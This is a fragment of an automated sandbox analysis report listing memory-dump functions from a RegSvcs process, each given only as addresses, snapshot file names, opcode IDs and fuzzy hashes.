                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59498093818.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_107d000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b0aa7573826e24b8e2131ac953be3ac2f5da651699e2143a17874b6bf6cd4cee
                                                                                                                                                          • Instruction ID: e298c3e07277524571fb462c0ed6c1047ef023c779996c83f980b4d6aecc991e
                                                                                                                                                          • Opcode Fuzzy Hash: b0aa7573826e24b8e2131ac953be3ac2f5da651699e2143a17874b6bf6cd4cee
                                                                                                                                                          • Instruction Fuzzy Hash: 45F0C271804344AEE7508A5ACCC4B62FFE8EF41770F28C45AED480B287C3799844CBB0
                                                                                                                                                          Function 06513D12 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3908ca3a06261e2ed6be1fd2460bd5c7e55be9fae5c2ceac51f0e10eede55626
                                                                                                                                                          • Instruction ID: 76d88367b46f09091b07d241c58ba99443049db1123c522c2fd202e2ab3f11e4
                                                                                                                                                          • Opcode Fuzzy Hash: 3908ca3a06261e2ed6be1fd2460bd5c7e55be9fae5c2ceac51f0e10eede55626
                                                                                                                                                          • Instruction Fuzzy Hash: 03F049306143449FD765CF28C8A0DA67BF4BF85244715896AE496CF621E760EE05DF80
                                                                                                                                                          Function 06518488 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f7ba7b32cb54ac07a8c9022ded998b08d13695148255bb011d1e2f6b414c8e3c
                                                                                                                                                          • Instruction ID: 44e48b71df41f160821e299f78fc237028127af19856e1e72200a970b719a8d2
                                                                                                                                                          • Opcode Fuzzy Hash: f7ba7b32cb54ac07a8c9022ded998b08d13695148255bb011d1e2f6b414c8e3c
                                                                                                                                                          • Instruction Fuzzy Hash: 17E09279512244AFCB11CB72CD01A8A3FB5EE4228131040E6E008CF221DA318E04C7D1
                                                                                                                                                          Function 06518772 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ad0d3fe68a3dd389f333cd57a1d6f109a572ca56ed20d7f88c651fcdb7d61a45
                                                                                                                                                          • Instruction ID: 5f766d0d41c34edb21ddbaa2077a344d22ec679fa8015f63efbd99540e58c897
                                                                                                                                                          • Opcode Fuzzy Hash: ad0d3fe68a3dd389f333cd57a1d6f109a572ca56ed20d7f88c651fcdb7d61a45
                                                                                                                                                          • Instruction Fuzzy Hash: BDE086715071845FD717D7B19D1185A7F74DE8219430801D6A0498F253DE214B15D7F1
                                                                                                                                                          Function 02880899 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59499182811.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_2880000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2d2dc3b5fa25f9b1a5e8f7a0fe0e25c08e2c44a17341ff33cf7701ddfefcbffa
                                                                                                                                                          • Instruction ID: d4d3b15f55f34f921a319712c554ff58b9b20948bb1c7a44c93ac4783c294399
                                                                                                                                                          • Opcode Fuzzy Hash: 2d2dc3b5fa25f9b1a5e8f7a0fe0e25c08e2c44a17341ff33cf7701ddfefcbffa
                                                                                                                                                          • Instruction Fuzzy Hash: 33E09A3490A389AFC702EBB8D81099D7FB8AA86104B1040DAE4C8CF212DA315E059752
                                                                                                                                                          Function 06518538 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 656167da76616b845eedd3fae085b5e104b92d525f159e29c2c35ddb6b80de8e
                                                                                                                                                          • Instruction ID: 0a05638593bc3f636b6da920a0605d6f54ef5d210f306d3fabcd540fd0d53120
                                                                                                                                                          • Opcode Fuzzy Hash: 656167da76616b845eedd3fae085b5e104b92d525f159e29c2c35ddb6b80de8e
                                                                                                                                                          • Instruction Fuzzy Hash: 9BE086319173589FC706DFE88D406DA3FB5EE8614074001E2D448DB251D5305A25D791
                                                                                                                                                          Function 06517F08 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b1456ace539e1d5e46b7ea9ebd05a77429f4e72750d77758339557fd005eac58
                                                                                                                                                          • Instruction ID: ae83582bde58b1ffdb989c7a6d36276d07e2a691c27740ca620b9f9c2317d875
                                                                                                                                                          • Opcode Fuzzy Hash: b1456ace539e1d5e46b7ea9ebd05a77429f4e72750d77758339557fd005eac58
                                                                                                                                                          • Instruction Fuzzy Hash: D0E02C329087408FC301EB68DD218D6FBB0EF83200709899FD4CA87612E720A847CBB2
                                                                                                                                                          Function 06516881 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c1bf8304f3dbbe7f201f1ee6e6f70922afec2684c341c32924aba400791a4a49
                                                                                                                                                          • Instruction ID: cc660288ef237fd961dd901c21602a576df828dab1eda80f5d2959d71a67b97f
                                                                                                                                                          • Opcode Fuzzy Hash: c1bf8304f3dbbe7f201f1ee6e6f70922afec2684c341c32924aba400791a4a49
                                                                                                                                                          • Instruction Fuzzy Hash: 23E0127610D250AFC712CF64E950947FFE2AF9A644B04888AE48597352C522DC56C772
                                                                                                                                                          Function 06518571 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2ca9ac4591a48fd2815a08837c668662e2a18b00205676e0d059a1153795548f
                                                                                                                                                          • Instruction ID: 412c777987f0dae31f0608b7973abd72c74e1815f681ad08672f050f94c27729
                                                                                                                                                          • Opcode Fuzzy Hash: 2ca9ac4591a48fd2815a08837c668662e2a18b00205676e0d059a1153795548f
                                                                                                                                                          • Instruction Fuzzy Hash: C4E08C3910E2C15BC302CF64ED00C46BFA2AB8A640B04488EE48453263C6219D16CB72
                                                                                                                                                          Function 06516700 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ae4ec0100d1c38dfce9a22b9c044744e065d626e8a0e7bcd24c171482548f8d6
                                                                                                                                                          • Instruction ID: 7aa90508483ad92f29df7dd35abbe83b16abb7d2b9ad5599d4cada082fed7898
                                                                                                                                                          • Opcode Fuzzy Hash: ae4ec0100d1c38dfce9a22b9c044744e065d626e8a0e7bcd24c171482548f8d6
                                                                                                                                                          • Instruction Fuzzy Hash: 15E0173010C3C08FC30ADB50D8518A3FFB5EBD6214719C8AFE4A6C7262C775A816CB61
                                                                                                                                                          Function 06516960 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8bb3de37e41f650a7c3e3b1e4b2a4c37b6106399695c12263bc68e6bd411098b
                                                                                                                                                          • Instruction ID: f7a5c34be2cdbc97052eed240ff05b3ca4ff2bc9cd9c7bc175c65bb56d502b8d
                                                                                                                                                          • Opcode Fuzzy Hash: 8bb3de37e41f650a7c3e3b1e4b2a4c37b6106399695c12263bc68e6bd411098b
                                                                                                                                                          • Instruction Fuzzy Hash: EBD0E23510C3D08FC302CB64A4204A2FBB1AF8B200729988FD4D987253C662E80ACB22
                                                                                                                                                          Function 06514A29 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f8e90fe999635edefb8dc17a6ea2311197b943e47ebca31ae75e2dc0d2b9b27d
                                                                                                                                                          • Instruction ID: 56e48efa1d38548e84e385ad19b8fdf7614e28415289a33d047022b803a223b0
                                                                                                                                                          • Opcode Fuzzy Hash: f8e90fe999635edefb8dc17a6ea2311197b943e47ebca31ae75e2dc0d2b9b27d
                                                                                                                                                          • Instruction Fuzzy Hash: 35D05E751182915FE244DB58D815B62BBA6FBC9204F09C85AF8C043355CA619C43C795
                                                                                                                                                          Function 06515EF8 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b18a59e73aa90f77ec1c29051e6f64a2c60f00efdb4edaed179481aff5ae0345
                                                                                                                                                          • Instruction ID: 055bc5cc5d8e1a60eb5125885636118d135f3df034af3007e09899b7496fc7d2
                                                                                                                                                          • Opcode Fuzzy Hash: b18a59e73aa90f77ec1c29051e6f64a2c60f00efdb4edaed179481aff5ae0345
                                                                                                                                                          • Instruction Fuzzy Hash: 57D05E765092019FC241CF64EE45D57BBA2EBD6704B09844EB448A6361EA22CC5ACA72
                                                                                                                                                          Function 028808A8 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59499182811.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_2880000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f7f17ede566a53f50088ff86abf73f09a183b8cb37a12848a58af292aff50925
                                                                                                                                                          • Instruction ID: d8970f415e151df22d8410a245cf927ca706d21bcd5db0e8ae0c844674dc6d08
                                                                                                                                                          • Opcode Fuzzy Hash: f7f17ede566a53f50088ff86abf73f09a183b8cb37a12848a58af292aff50925
                                                                                                                                                          • Instruction Fuzzy Hash: AFD01770A0420DEFCB00EFA8E955A9DB7B9EB84200B1085A9D848DB200EB316E009B95
                                                                                                                                                          Function 06518AD0 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a69fce691be828654f0f5e3e09796e8f69cf5c0aaf3a9330b194421da193a648
                                                                                                                                                          • Instruction ID: b947b43ffcd9cd15d18bdb1553bbbee3dfb1bad5517a082ab760d343f6d46d91
                                                                                                                                                          • Opcode Fuzzy Hash: a69fce691be828654f0f5e3e09796e8f69cf5c0aaf3a9330b194421da193a648
                                                                                                                                                          • Instruction Fuzzy Hash: F9D0926251E6808BD316C2748D66AD2BFE18A56288319C89AC4D98A293C622A80BC765
                                                                                                                                                          Function 06514628 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 372116bfaccd07c895e35743cbe45488da045ac6d596af0d291fcb2205cca8f7
                                                                                                                                                          • Instruction ID: 91d7d4fecabe50391625dd54b8a6402922cf959b35cd98edf120792067fc13e4
                                                                                                                                                          • Opcode Fuzzy Hash: 372116bfaccd07c895e35743cbe45488da045ac6d596af0d291fcb2205cca8f7
                                                                                                                                                          • Instruction Fuzzy Hash: 36D052352083808BC244DB88E881A92BB72FBC4204F18880AE49097321C7229823CB52
                                                                                                                                                          Function 06518548 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 85f6ee15c4dce937adb3785f05b1517375d6122bd709eb21d1201decbc2da2f1
                                                                                                                                                          • Instruction ID: bcc046ea6808ecc2f08fbec7c8537fb2577ee45b344eb1d62dbfab462b4bc02e
                                                                                                                                                          • Opcode Fuzzy Hash: 85f6ee15c4dce937adb3785f05b1517375d6122bd709eb21d1201decbc2da2f1
                                                                                                                                                          • Instruction Fuzzy Hash: F1D0C971D1230CEB8B01EFE9994099EB7FDDF85100B5041E69908D7650EA315A209791
                                                                                                                                                          Function 065148F8 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 58728b338a9686286421e88c92693fc0084c7b8c40dbd88513fedd0c02b3be36
                                                                                                                                                          • Instruction ID: 11a48016791414ee84f23ae07ecb06dadf65784c8ecc5c25704392256191d021
                                                                                                                                                          • Opcode Fuzzy Hash: 58728b338a9686286421e88c92693fc0084c7b8c40dbd88513fedd0c02b3be36
                                                                                                                                                          • Instruction Fuzzy Hash: 5DD05E3810C3814FC342CB14E850816BF61AF86104B09888AD49187753CB21D806CB21
                                                                                                                                                          Function 06516890 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                          • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                                                                                                          • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                          • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                                                                                                          Function 06518580 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                          • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                                                                                                          • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                          • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                                                                                                          Function 06514F40 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b854b229bc3b0b894efac5a25862f708869f060dc990eb673249d41b3f806bcb
                                                                                                                                                          • Instruction ID: 36cbb5690bf394351a83950f36538387c2335619ee29e01b2f8de1c28562c187
                                                                                                                                                          • Opcode Fuzzy Hash: b854b229bc3b0b894efac5a25862f708869f060dc990eb673249d41b3f806bcb
                                                                                                                                                          • Instruction Fuzzy Hash: 3EC04C351590845ED245872CE4617657F66AB89209F5CC0A8E4C48B15ACA22D8438644
                                                                                                                                                          Function 02880880 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59499182811.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_2880000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e79c70bb94e3c9ad59e9150ea7fe97341aac62a55056d2edd37717eda0ee8e2a
                                                                                                                                                          • Instruction ID: 4c56bc10b44fd654663e9906d2da094d6a402bed8ba47f575be32d93713940af
                                                                                                                                                          • Opcode Fuzzy Hash: e79c70bb94e3c9ad59e9150ea7fe97341aac62a55056d2edd37717eda0ee8e2a
                                                                                                                                                          • Instruction Fuzzy Hash: 06C0482020F7C40AD703073888211843F34EE875AC3AE44CBD0C8EF6A3C429580E939A
                                                                                                                                                          Function 06518410 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d1c942720a41d5c961d0e9339b660b5f560cc0dafc24ea647e77129897261323
                                                                                                                                                          • Instruction ID: 51a00ed06b62627baaed2d7bb501b7cc0a08c4f15d0bd0226f0849d4298023a4
                                                                                                                                                          • Opcode Fuzzy Hash: d1c942720a41d5c961d0e9339b660b5f560cc0dafc24ea647e77129897261323
                                                                                                                                                          • Instruction Fuzzy Hash: 03B0084021FBE02BD71687254CA86D32F679A46295B9A12C6B088890938159562AD6A6
                                                                                                                                                          Function 065155D0 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 183d2e50651be697a6be304096969d514b2e586886f71e8e3057dd2e4c42bfd0
                                                                                                                                                          • Instruction ID: 7438e1ec2a4a8c3c8d11adc7da09ea0c80221a8e2e468359e075268e5ff28742
                                                                                                                                                          • Opcode Fuzzy Hash: 183d2e50651be697a6be304096969d514b2e586886f71e8e3057dd2e4c42bfd0
                                                                                                                                                          • Instruction Fuzzy Hash: 34C04C6414E3C04FD306C7249D65451BF305F4610575DA0CAE494CB667D616DD07DB17
                                                                                                                                                          Function 06515472 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: dcea35f40bb54d395e7291bf5a5ab456e9ccce7a6146c64c8d288614f2adfe91
                                                                                                                                                          • Instruction ID: 027356ce1ef642d8c77911956f437d4203da95506b84db7714c180c7e32c92e4
                                                                                                                                                          • Opcode Fuzzy Hash: dcea35f40bb54d395e7291bf5a5ab456e9ccce7a6146c64c8d288614f2adfe91
                                                                                                                                                          • Instruction Fuzzy Hash: F5C02B340001804AD6009364E4103207F32AB86005F18C0C594C00620BCF329403C700
                                                                                                                                                          Function 06518420 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                          • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                                                          • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                          • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                                                          Function 06515CE0 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                          • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                                                          • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                          • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                                                          Function 06515960 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
